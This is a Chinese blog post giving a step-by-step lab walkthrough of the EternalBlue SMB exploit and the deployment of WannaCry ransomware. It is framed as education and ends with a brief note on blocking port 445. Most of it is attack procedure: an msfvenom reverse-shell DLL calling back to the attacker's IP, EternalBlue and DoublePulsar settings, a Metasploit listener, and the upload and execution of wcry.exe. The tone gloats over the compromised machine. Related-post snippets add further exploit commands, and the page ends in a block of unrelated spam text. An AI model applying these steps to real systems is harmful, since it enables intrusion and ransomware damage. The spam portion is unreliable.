勒索病毒“WannaCry”之复现过程(永恒之蓝)

1 篇文章 0 订阅
订阅专栏

1.漏洞简述

“永恒之蓝”利用Windows系统的SMB漏洞获取系统的最高权限,该工具通过恶意代码扫描开放445端口的Windows系统;被扫描到的Windows系统,只要开机上线,不要要用户进行任何操作,即可通过共享漏洞上传wannacry勒索病毒,远程控制木马等恶意程序。

2.漏洞复现

2.1复现环境

注意:复现过程请在虚拟机中运行,运行之前关闭虚拟机的文件共享,否则有可能感染真机,真机一旦被感染,你就真的真的“想哭”(wannacry)了

2.2.1 环境搭建:

    攻击机1:kali-linux-2018.2-i386                            IP:192.168.15.176
    攻击机2:win_server_2003                                   IP:192.168.15.154
    靶机   :win_07(x64)                                       IP:192.168.15.164

2.2.2实验工具:

	 Python 2.6                : https://www.python.org/download/releases/2.6/
	 Python32-221.win32-py2.6  :https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/
	 Shadowbroker-master 工具包:https://github.com/misterch0c/shadowbroker.git

2.2.3 攻击机2(win_server_2003 )配置

	第一步:安装Python 2.6,配置环境变量,添加Python26的安装路径到path(例如:安装路径为C:\Python26\,在path中追加;C:\Python26\;注:前后分号为英文格式);
	第二步:安装Python32-221.win32-py2.6,傻瓜式安装即可
	第三步:安装Shadowbroker-master,将安装包copy到攻击机2中,在Windows文件夹中新建文件夹logs和listeningposts;用记事本打开Windows文件夹中的Fuzzbunch.xml文件,修改ResourcesDir和LOogDir的路径;

修改路径
第四步:运行永恒之蓝工具,若出现一下界面则恭喜你工具安装成功:
安装成功

2.3复现过程

2.3.1 扫描靶机是否开启445端口靶机开启445
2.3.2 kali生成后门文件(文件类型:.dll)

 3.2.1:使用kali的msfvenom工具:其中 -p:指定使用模块类型;LSHOT:指定本地IP;LPORT:指定本地端口(具体使用方法,自行help):
 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.15.176 LPORT=6666 -f dll > abc.dl	 

生成连接文件

 3.2.2 上传dll文件到攻击机2中,可使用SecureCRT 或xshell等外联软件;或者简单粗暴使用,给虚拟机直接装wmvare tools,直接傻瓜式来回拷贝即可。	

上传dll文件

2.3.3 开始攻击

3.3.1 攻击机2---->开始运行“永恒之蓝:

  1.默认目标IP地址:Default Targer IP Address: 靶机IP
  2.默认回弹IP地址:Default Callback IP Address:攻击机1IP地址
  3.是否使用重定向:Use Rdirection [yes] :no
  4.新建项目:Create a New Project
  5.给项目起个名字:New Project Name:test1
  6.其他选项,全部默认,直接enter即可

运行fg.py
攻击阶段一
3.3.2 攻击机2---->加载“永恒之蓝”模块,获取靶机的系统权限:

 1.加载永恒之蓝:use Eternalblue
 2.靶机操作系统类型,根据攻击前收集信息可知靶机为win7(直接用nmap扫描即可获得靶机信息),选择对应编号
 3.模式mode:选择FB(该模式下,会进行交互性参数输入)
 4.其他大都为确认信息,其他参数可默认也可自行修改
 5.看到WIN、Eternalblue Succeeded,那么恭喜你获取靶机权限成功

加载Ethernalblue 参数设置
在这里插入图片描述
3.3.3 攻击机1---->kali开启监听,等待返回shell

 1.加载msfconsole
 2.加载handler:use exploit/multi/handler
 3.设置paylod:set payload windows/x64/meterpreter/reverse_tcp
 4.设置本地IP:set LHOST 192.168.15.176
 5.设置本地端口:set LPORT 6666
 6.开始监听:run

加载msf
开启监听
3.3.4 攻击机2---->win_server_2003进行双倍脉冲(Doublepulsar)注入:

 1.加载Doublepulsar:use Doublepulsar
 2.使用协议:选择SMB(关于SMB和RDP,自行百度)
 3.使用后门的方法:2选择RunDll
 4.设置dll路径:c:\\abc.dll
 5.其他操作默认即可,直接enter
 6.注入成功:Doublepulsar
 7.返回kali,看到meterpreter,恭喜你已经成功获取靶机shell

双脉冲注入
rundll
rundll注入
反弹shell
3.3.5 攻击机1---->上传勒索病毒并执行:

 1.在靶机上传文本类文件,以验证实验
 2.kali上传勒索病毒:upload /root/wcry.exe  c:\\
 3.获取靶机cmd:shell
 4.解决反弹shell后中文乱码问题:chcp 65001
 5.进入c盘查看文件:dir
 6.运行病毒:直接执行就好,获取靶机cmd后,靶机已经属于你了,可以任由你怎么蹂躏都可以。

上传并运行
3.3.6 返回靶机,尽情享受靶机被蹂躏的欢乐吧
在这里插入图片描述

3.结语

本次实验对“永恒之蓝”进行wannacry攻击的过程进行复现,本次复现过程在虚拟机中进行,不可在真机中运行,实验前一定关闭虚拟机的文件文件共享功能;本次复现过程旨在认识勒索病毒攻击靶机的过程,通过对病毒入侵的过程进行复现,了解病毒的危害,加强防范意识。

4.防范

关闭虚拟机共享
关闭共享
勒索病毒主要通过445端口入侵计算机,以下以445为例关闭端口
控制面板–>windows防火墙—>高级选项–>入站规则–>1.新建规则,选择端口–>2.指定端口号–>3.选择阻止连接–>4.配置文件全选–>5.规则名称–>6.成功关闭
关闭445端口
自己录制了一个勒索病毒大战彩虹猫的视频,有兴趣的小伙伴可以自行去看一下: https://v.youku.com/v_show/id_XNDMwNDU1NTE2MA==.html
勒索病毒大战彩虹猫

[网络安全自学篇] 七十三.WannaCry勒索病毒复现及分析(四)蠕虫传播机制全网源码详细解读
杨秀璋的专栏
05-05 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了逆向分析OllyDbg动态调试工具的基本用法,包括界面介绍、常用快捷键和TraceMe案例分析。这篇文章将继续详细讲解WannaCry蠕虫的传播机制,带领大家详细阅读源代码,分享WannaCry勒索病毒是如何传播感染的。作者分析该病毒一个月,一方面觉得自己技术菜,另一方面深知系统安全需要坚持,继续加油。希望文章对您有所帮助~
[网络安全自学篇] 六十八.WannaCry勒索病毒复现及分析(二)MS17-010利用及病毒解析
杨秀璋的专栏
04-20 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了通过Python利用永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
永恒之蓝勒索病毒复现与利用
qq_38348692的博客
08-08 3210
整个的复现过程需要的环境以及工具有: kali 2.0:用来监听获取反弹的shell。ip:192.168.15.174 winsever 2003 :需要装上python环境,勒索病毒攻击机。ip:192.168.15.141 win2007 :靶机,确保445端口开启。ip:192.168.15.144 永恒之蓝 python2.6已经在winsever下装python需...
EternalBlue【永恒之蓝】漏洞详解(复现、演示、远程,2024最新阿里网络安全高级面试题及答案
最新发布
2401_83974639的博客
04-13 753
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
73.WannaCry勒索病毒复现及分析(四)蠕虫传播机制全网源码详细解读_网络_杨秀璋的专栏-CSDN博客1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。前文学习:[网络
勒索病毒WannaCry复现
Lemon's blog
10-20 5039
漏洞简介 永恒之蓝利用Windows系统的SMB漏洞可以获取系统的最高权限,然后通过恶意代码扫描开放445端口的Windows系统;只要是被扫描到的Windows系统,只要开机上线,不需要用户进行任何操作,即可通过共享漏洞上传wannacry勒索病毒,远程控制木马等恶意程序。 漏洞复现复现过程中需要先做好防护,以免造成真机感染病毒,那就GG了 ...
复现勒索病毒WannaCry过程
mulincong的博客
05-23 365
复现勒索病毒WannaCry过程
永恒之蓝漏洞攻击完整步骤
G_Fu_Q的博客
11-07 8968
kali攻击机 windows2003/windows2008被攻击机 ip:192.168.15.129 1.进行端口扫描 nmap -Pn -sV -T4 ip地址 明白445端口和3389端口open,3389关闭现在无所谓,如果开启以后拿到权限以后就不用做开启3389端口的操作 2.漏洞脚本检测 nmap --script=vuln 192.168.15.129(ip地址) 看出ms17-010漏洞可以攻击 3.msfconsole测试 msfconsole 4.
渗透基础笔记+作业(永恒之蓝复现
09-08
渗透基础+永恒之蓝复现 漏洞挖掘 win7 ms17-010
电脑病毒WannaCry永恒之蓝)更新补丁蓝屏处理办法
05-16
电脑病毒WannaCry永恒之蓝)更新补丁蓝屏处理办法,win7系统测试成功。
0x20.第二十课 MetaSploit检测并复现永恒之蓝.pdf
06-24
0x20.第二十课 MetaSploit检测并复现永恒之蓝.pdf
[网络安全自学篇] 六十七.WannaCry勒索病毒复现及分析(一)Python利用永恒之蓝及Win7勒索加密
杨秀璋的专栏
04-14 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的DC-1题目,通过信息收集、CMS漏洞搜索、Drupal漏洞利用、Metasploit反弹shell、提权及数据库爆破获取flag。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒复现及分析,希望这篇基础性文章对您有所帮助。
转自瑞星:“永恒之蓝WannaCry勒索病毒分析报告
weixin_30472035的博客
05-14 507
转自瑞星:“永恒之蓝WannaCry勒索病毒分析报告 2017-05-13 WannaCry勒索病毒 通过windows操作系统漏洞EternalBlue永恒之蓝 发起攻击。3月14 微软已经发布补丁,由于很多受害者没有及时安装补丁,导致被病毒攻击,计算机中的文件被加密。 一. 背景介绍 WannaCry勒索病毒 通过window...
永恒之蓝过程复现
Zhaokangkang123的博客
02-09 6138
超详细永恒之蓝复现教程
实战攻击-永恒之蓝
网络安全领域优质创作者
11-05 1161
nmap-T4 -A -sS-sV-vv--script vuln -p- --open -n -Pn10.11.1.7-oX 10.11.1.7.xml 格式转换:xsltproc-o118.190.244.96.html118.190.244.96.xml ms08-067 方案一: msfconsole search ms08-067 use exploit/windows/smb/ms08_067_netapi show payloads set ...
网络攻防——永恒之蓝
weixin_46560512的博客
03-09 2万+
主要介绍永恒之蓝程序,即 windows7的SMB协议漏洞以及相关的攻击方式。
永恒之蓝漏洞利用及攻击
热门推荐
wwl012345的博客
04-20 9万+
一、基础知识介绍: 1.何为永恒之蓝永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎...
使用MSF复现永恒之蓝
11-27
为了使用MSF复现永恒之蓝漏洞,可以按照以下步骤进行操作: 1. 打开终端并启动msfconsole,输入以下命令: ```shell msfconsole ``` 2. 在msfconsole中,使用search命令搜索ms17-010漏洞: ```shell search ms17-010 ``` 3. 选择一个合适的exploit并设置相关参数,例如: ```shell use exploit/windows/smb/ms17_010_eternalblue set RHOSTS <目标IP地址> set RPORT 445 ``` 4. 运行exploit并等待结果: ```shell run ``` 5. 如果成功利用漏洞,将会得到一个Meterpreter shell,可以使用各种命令进行操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
写文章

热门文章

  • SQL注入时当and、or等字符被过滤了怎么办 16286
  • DVWA学习之XSS(跨站脚本攻击)(超级详细) 14015
  • 流量Ⅰ--一文了解pcap网络数据包的结构? 9726
  • python 字符串转为十六进制字符串 8993
  • DVWA学习之Weak Session IDs (弱会话IDs) 7219

分类专栏

  • C语言 1篇
  • python 28篇
  • 爬虫 2篇
  • 流量分析 1篇
  • linux 3篇
  • Redis数据库从0到1 2篇
  • 安全 1篇
  • R语言 2篇
  • 数据驱动安全(DATA-DRIVENSECURITY) 2篇
  • 理论知识 1篇
  • 恶意代码分析实战 1篇
  • AppMon 1篇
  • PHP 2篇
  • 常见漏洞 2篇
  • 协议 2篇
  • web  for pentester_1 学习 1篇
  • 复现 1篇
  • DVWA学习 11篇
  • 杂谈 6篇

最新评论

  • 流量Ⅰ--一文了解pcap网络数据包的结构?

    litchi125: 这就是理论派与实践派,理论派只会制定标准,实践派才会真正的做出来适用的

  • 流量Ⅰ--一文了解pcap网络数据包的结构?

    笑竹客: 总感觉OSI 七层网络模型有些臃肿,各层有些功能重复表情包

  • DVWA学习之XSS(跨站脚本攻击)(超级详细)

    m0_68892989: 感谢作者,好详细。表情包

  • Linux 虚拟机报错:另一个程序已锁定文件的一部分,进程无法访问。。(或者锁定文件失败)

    栀子花不不不想开: 非常的有帮助

  • 勒索病毒“WannaCry”之复现过程(永恒之蓝)

    MakerA6: 谢谢!

大家在看

  • java的集合
  • Hadoop的Windows环境准备
  • 国密SSL证书怎么申请?有什么优势? 297
  • Shell编程实战
  • 03_初识Spring Cloud Gateway 1102

最新文章

  • VS Code C语言环境搭建
  • 流量Ⅰ--一文了解pcap网络数据包的结构?
  • python MySQL入库json格式数据问题
2021年2篇
2020年40篇
2019年30篇

目录

目录

评论 82
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43元 前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值

两个鬼故事私募排行榜射雕英雄传电视剧步步错蜜桃成熟33dcctv-4直播起名女公司起名公司上海滩周润发龙妻凤夫破产后东山再起的名人姓石的起名男孩取名起名字啊楚玄辰云若月小说免费阅读麦芽网鞋店装修效果图朱起名字周易起名的姓名测试园林公司起什么名字好吗莎翁情史陌字起名字寓意好吗女圣骑士起个什么名字怎么样起笔名根据生辰八字起名字打分测试打分瘗玉埋香韩国字起名女孩兰亭周易起名网名字名字起人名大全远古战神半夜莫名其妙勃起怎么查询公司的起名少年生前被连续抽血16次?多部门介入两大学生合买彩票中奖一人不认账让美丽中国“从细节出发”淀粉肠小王子日销售额涨超10倍高中生被打伤下体休学 邯郸通报单亲妈妈陷入热恋 14岁儿子报警何赛飞追着代拍打雅江山火三名扑火人员牺牲系谣言张家界的山上“长”满了韩国人?男孩8年未见母亲被告知被遗忘中国拥有亿元资产的家庭达13.3万户19岁小伙救下5人后溺亡 多方发声315晚会后胖东来又人满为患了张立群任西安交通大学校长“重生之我在北大当嫡校长”男子被猫抓伤后确诊“猫抓病”测试车高速逃费 小米:已补缴周杰伦一审败诉网易网友洛杉矶偶遇贾玲今日春分倪萍分享减重40斤方法七年后宇文玥被薅头发捞上岸许家印被限制高消费萧美琴窜访捷克 外交部回应联合利华开始重组专访95后高颜值猪保姆胖东来员工每周单休无小长假男子被流浪猫绊倒 投喂者赔24万小米汽车超级工厂正式揭幕黑马情侣提车了西双版纳热带植物园回应蜉蝣大爆发当地回应沈阳致3死车祸车主疑毒驾恒大被罚41.75亿到底怎么缴妈妈回应孩子在校撞护栏坠楼外国人感慨凌晨的中国很安全杨倩无缘巴黎奥运校方回应护栏损坏小学生课间坠楼房客欠租失踪 房东直发愁专家建议不必谈骨泥色变王树国卸任西安交大校长 师生送别手机成瘾是影响睡眠质量重要因素国产伟哥去年销售近13亿阿根廷将发行1万与2万面值的纸币兔狲“狲大娘”因病死亡遭遇山火的松茸之乡“开封王婆”爆火:促成四五十对奥巴马现身唐宁街 黑色着装引猜测考生莫言也上北大硕士复试名单了德国打算提及普京时仅用姓名天水麻辣烫把捣辣椒大爷累坏了

两个鬼故事 XML地图 TXT地图 虚拟主机 SEO 网站制作 网站优化